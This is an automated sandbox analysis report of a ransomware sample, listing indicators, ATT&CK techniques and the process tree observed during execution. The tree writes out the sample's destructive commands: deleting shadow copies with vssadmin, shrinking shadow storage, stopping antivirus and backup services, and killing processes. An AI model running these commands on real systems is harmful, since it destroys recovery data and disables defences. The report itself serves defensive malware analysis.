9942fa46a96baad6479248bf0a7874a0b03afe35577527524dc10fcbd01e7e48

General

Target

9942fa46a96baad6479248bf0a7874a0b03afe35577527524dc10fcbd01e7e48
Sample

200110-1s3n6rbyfe
SHA256

9942fa46a96baad6479248bf0a7874a0b03afe35577527524dc10fcbd01e7e48

Score

9^/10

evasion spreading ransomware

Malware Config

Signatures

Deletes shadow copies 2 TTPs 2 IoCs
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

3732 vssadmin.exe
4500 vssadmin.exe

pid	process
3732	vssadmin.exe
4500	vssadmin.exe

Interacts with shadow copies 2 TTPs 12 IoCs

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
5068	vssadmin.exe
1708	vssadmin.exe
4128	vssadmin.exe
4060	vssadmin.exe
4876	vssadmin.exe
4564	vssadmin.exe
4940	vssadmin.exe
772	vssadmin.exe
4384	vssadmin.exe
2396	vssadmin.exe
4996	vssadmin.exe
1976	vssadmin.exe

Runs net.exe 10 IoCs

Processes:

net.exenet.exenet.exenet.exenet.exenet1.exenet1.exenet1.exenet1.exenet1.exe

pid process

5044 net.exe
5112 net.exe
1572 net.exe
1012 net.exe
3988 net.exe
4208 net1.exe
2040 net1.exe
3996 net1.exe
4504 net1.exe
5084 net1.exe
Launches SC.exe 4 IoCs

Processes:

sc.exesc.exesc.exesc.exe

pid process

3316 sc.exe
4608 sc.exe
4576 sc.exe
4536 sc.exe

pid	process
5044	net.exe
5112	net.exe
1572	net.exe
1012	net.exe
3988	net.exe
4208	net1.exe
2040	net1.exe
3996	net1.exe
4504	net1.exe
5084	net1.exe

pid	process
3316	sc.exe
4608	sc.exe
4576	sc.exe
4536	sc.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

9942fa46a96baad6479248bf0a7874a0b03afe35577527524dc10fcbd01e7e48.exe

description	pid	process	target process
PID 4932 set thread context of 4952	4932	9942fa46a96baad6479248bf0a7874a0b03afe35577527524dc10fcbd01e7e48.exe	csc.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

4704 taskkill.exe
4348 taskkill.exe
4308 taskkill.exe

pid	process
4704	taskkill.exe
4348	taskkill.exe
4308	taskkill.exe

Drops startup file 2 IoCs

Processes:

9942fa46a96baad6479248bf0a7874a0b03afe35577527524dc10fcbd01e7e48.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9942fa46a96baad6479248bf0a7874a0b03afe35577527524dc10fcbd01e7e48.exe	9942fa46a96baad6479248bf0a7874a0b03afe35577527524dc10fcbd01e7e48.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9942fa46a96baad6479248bf0a7874a0b03afe35577527524dc10fcbd01e7e48.exe	9942fa46a96baad6479248bf0a7874a0b03afe35577527524dc10fcbd01e7e48.exe

Runs ping.exe 1 TTPs 1 IoCs
evasion spreading

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

5004 PING.EXE

pid	process
5004	PING.EXE

Drops file in Program Files directory 257 IoCs

Processes:

csc.exe

description	ioc	process
File opened for modification	C:\Program Files\7-Zip\Lang\sr-spl.txt	csc.exe
File deleted	C:\Program Files\7-Zip\Lang\ca.txt	csc.exe
File opened for modification	C:\Program Files\7-Zip\Lang\eo.txt	csc.exe
File opened for modification	C:\Program Files\7-Zip\Lang\es.txt	csc.exe
File deleted	C:\Program Files\7-Zip\Lang\ka.txt	csc.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ko.txt	csc.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ky.txt	csc.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pt-br.txt	csc.exe
File deleted	C:\Program Files\7-Zip\History.txt	csc.exe
File deleted	C:\Program Files\7-Zip\Lang\io.txt	csc.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kk.txt	csc.exe
File created	C:\Program Files\PingSubmit.txt.pashka	csc.exe
File deleted	C:\Program Files\7-Zip\Lang\mn.txt	csc.exe
File deleted	C:\Program Files\7-Zip\Lang\pt.txt	csc.exe
File created	C:\Program Files\7-Zip\Lang\sr-spl.txt.pashka	csc.exe
File deleted	C:\Program Files\7-Zip\Lang\fr.txt	csc.exe
File created	C:\Program Files\7-Zip\Lang\fy.txt.pashka	csc.exe
File created	C:\Program Files\7-Zip\Lang\ja.txt.pashka	csc.exe
File deleted	C:\Program Files\7-Zip\Lang\tr.txt	csc.exe
File created	C:\Program Files\7-Zip\Lang\id.txt.pashka	csc.exe
File deleted	C:\Program Files\7-Zip\Lang\kab.txt	csc.exe
File created	C:\Program Files\7-Zip\Lang\ky.txt.pashka	csc.exe
File deleted	C:\Program Files\7-Zip\Lang\kk.txt	csc.exe
File opened for modification	C:\Program Files\7-Zip\Lang\et.txt	csc.exe
File deleted	C:\Program Files\7-Zip\Lang\fy.txt	csc.exe
File deleted	C:\Program Files\7-Zip\Lang\he.txt	csc.exe
File deleted	C:\Program Files\7-Zip\Lang\gl.txt	csc.exe
File deleted	C:\Program Files\7-Zip\Lang\sk.txt	csc.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tt.txt	csc.exe
File deleted	C:\Program Files\7-Zip\Lang\hu.txt	csc.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mng.txt	csc.exe
File created	C:\Program Files\7-Zip\Lang\ps.txt.pashka	csc.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sq.txt	csc.exe
File deleted	C:\Program Files\7-Zip\Lang\sq.txt	csc.exe
File created	C:\Program Files\7-Zip\Lang\ca.txt.pashka	csc.exe
File opened for modification	C:\Program Files\7-Zip\Lang\cy.txt	csc.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fy.txt	csc.exe
File created	C:\Program Files\7-Zip\Lang\mng2.txt.pashka	csc.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pt.txt	csc.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ro.txt	csc.exe
File deleted	C:\Program Files\7-Zip\Lang\ar.txt	csc.exe
File created	C:\Program Files\7-Zip\Lang\hi.txt.pashka	csc.exe
File opened for modification	C:\Program Files\7-Zip\Lang\is.txt	csc.exe
File created	C:\Program Files\7-Zip\Lang\lt.txt.pashka	csc.exe
File opened for modification	C:\Program Files\7-Zip\Lang\nl.txt	csc.exe
File opened for modification	C:\Program Files\7-Zip\Lang\cs.txt	csc.exe
File deleted	C:\Program Files\7-Zip\Lang\it.txt	csc.exe
File deleted	C:\Program Files\7-Zip\Lang\ko.txt	csc.exe
File opened for modification	C:\Program Files\7-Zip\Lang\gu.txt	csc.exe
File deleted	C:\Program Files\7-Zip\Lang\hi.txt	csc.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tr.txt	csc.exe
File created	C:\Program Files\7-Zip\Lang\az.txt.pashka	csc.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fur.txt	csc.exe
File opened for modification	C:\Program Files\7-Zip\Lang\nn.txt	csc.exe
File deleted	C:\Program Files\7-Zip\Lang\sa.txt	csc.exe
File deleted	C:\Program Files\7-Zip\Lang\sv.txt	csc.exe
File opened for modification	C:\Program Files\7-Zip\Lang\it.txt	csc.exe
File deleted	C:\Program Files\7-Zip\Lang\ug.txt	csc.exe
File created	C:\Program Files\7-Zip\Lang\co.txt.pashka	csc.exe
File created	C:\Program Files\7-Zip\Lang\fur.txt.pashka	csc.exe
File created	C:\Program Files\7-Zip\Lang\io.txt.pashka	csc.exe
File deleted	C:\Program Files\7-Zip\Lang\lij.txt	csc.exe
File created	C:\Program Files\7-Zip\Lang\ne.txt.pashka	csc.exe
File deleted	C:\Program Files\PingSubmit.txt	csc.exe

Suspicious use of WriteProcessMemory 34 IoCs

Processes:

9942fa46a96baad6479248bf0a7874a0b03afe35577527524dc10fcbd01e7e48.execmd.execsc.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 4932 wrote to memory of 4952	4932	9942fa46a96baad6479248bf0a7874a0b03afe35577527524dc10fcbd01e7e48.exe	csc.exe
PID 4932 wrote to memory of 4964	4932	9942fa46a96baad6479248bf0a7874a0b03afe35577527524dc10fcbd01e7e48.exe	cmd.exe
PID 4964 wrote to memory of 5004	4964	cmd.exe	PING.EXE
PID 4952 wrote to memory of 5044	4952	csc.exe	net.exe
PID 5044 wrote to memory of 5084	5044	net.exe	net1.exe
PID 4952 wrote to memory of 5112	4952	csc.exe	net.exe
PID 5112 wrote to memory of 4208	5112	net.exe	net1.exe
PID 4952 wrote to memory of 1572	4952	csc.exe	net.exe
PID 1572 wrote to memory of 2040	1572	net.exe	net1.exe
PID 4952 wrote to memory of 1012	4952	csc.exe	net.exe
PID 1012 wrote to memory of 3996	1012	net.exe	net1.exe
PID 4952 wrote to memory of 3988	4952	csc.exe	net.exe
PID 3988 wrote to memory of 4504	3988	net.exe	net1.exe
PID 4952 wrote to memory of 4536	4952	csc.exe	sc.exe
PID 4952 wrote to memory of 3316	4952	csc.exe	sc.exe
PID 4952 wrote to memory of 4608	4952	csc.exe	sc.exe
PID 4952 wrote to memory of 4576	4952	csc.exe	sc.exe
PID 4952 wrote to memory of 4704	4952	csc.exe	taskkill.exe
PID 4952 wrote to memory of 4348	4952	csc.exe	taskkill.exe
PID 4952 wrote to memory of 4308	4952	csc.exe	taskkill.exe
PID 4952 wrote to memory of 3732	4952	csc.exe	vssadmin.exe
PID 4952 wrote to memory of 4128	4952	csc.exe	vssadmin.exe
PID 4952 wrote to memory of 4060	4952	csc.exe	vssadmin.exe
PID 4952 wrote to memory of 2396	4952	csc.exe	vssadmin.exe
PID 4952 wrote to memory of 4876	4952	csc.exe	vssadmin.exe
PID 4952 wrote to memory of 4564	4952	csc.exe	vssadmin.exe
PID 4952 wrote to memory of 4940	4952	csc.exe	vssadmin.exe
PID 4952 wrote to memory of 4996	4952	csc.exe	vssadmin.exe
PID 4952 wrote to memory of 772	4952	csc.exe	vssadmin.exe
PID 4952 wrote to memory of 5068	4952	csc.exe	vssadmin.exe
PID 4952 wrote to memory of 1976	4952	csc.exe	vssadmin.exe
PID 4952 wrote to memory of 1708	4952	csc.exe	vssadmin.exe
PID 4952 wrote to memory of 4384	4952	csc.exe	vssadmin.exe
PID 4952 wrote to memory of 4500	4952	csc.exe	vssadmin.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

csc.exetaskkill.exetaskkill.exetaskkill.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	4952	csc.exe
Token: SeDebugPrivilege	4704	taskkill.exe
Token: SeDebugPrivilege	4348	taskkill.exe
Token: SeDebugPrivilege	4308	taskkill.exe
Token: SeBackupPrivilege	4100	vssvc.exe
Token: SeRestorePrivilege	4100	vssvc.exe
Token: SeAuditPrivilege	4100	vssvc.exe

C:\Users\Admin\AppData\Local\Temp\9942fa46a96baad6479248bf0a7874a0b03afe35577527524dc10fcbd01e7e48.exe
"C:\Users\Admin\AppData\Local\Temp\9942fa46a96baad6479248bf0a7874a0b03afe35577527524dc10fcbd01e7e48.exe"
1⤵
- Suspicious use of SetThreadContext
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:4932

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:4952

C:\Windows\SysWOW64\net.exe
"net.exe" stop avpsus /y
3⤵
- Runs net.exe
- Suspicious use of WriteProcessMemory
PID:5044

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop avpsus /y
4⤵
- Runs net.exe
PID:5084

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeDLPAgentService /y
3⤵
- Runs net.exe
- Suspicious use of WriteProcessMemory
PID:5112

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
4⤵
- Runs net.exe
PID:4208

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfewc /y
3⤵
- Runs net.exe
- Suspicious use of WriteProcessMemory
PID:1572

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfewc /y
4⤵
- Runs net.exe
PID:2040

C:\Windows\SysWOW64\net.exe
"net.exe" stop BMR Boot Service /y
3⤵
- Runs net.exe
- Suspicious use of WriteProcessMemory
PID:1012

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
4⤵
- Runs net.exe
PID:3996

C:\Windows\SysWOW64\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
3⤵
- Runs net.exe
- Suspicious use of WriteProcessMemory
PID:3988

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
4⤵
- Runs net.exe
PID:4504

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
3⤵
- Launches SC.exe
PID:4536

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
3⤵
- Launches SC.exe
PID:3316

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLWriter start= disabled
3⤵
- Launches SC.exe
PID:4608

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SstpSvc start= disabled
3⤵
- Launches SC.exe
PID:4576

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4704

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4348

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4308

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
3⤵
- Deletes shadow copies
PID:3732

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:4128

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:4060

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:2396

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:4876

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:4564

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:4940

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:4996

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:772

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:5068

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:1976

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:1708

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:4384

C:\Windows\SysWOW64\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
3⤵
- Deletes shadow copies
PID:4500

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\9942fa46a96baad6479248bf0a7874a0b03afe35577527524dc10fcbd01e7e48.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:4964

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
3⤵
- Runs ping.exe
PID:5004

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4100

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

2

T1107

Credential Access

Discovery

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

2

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/4952-0-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads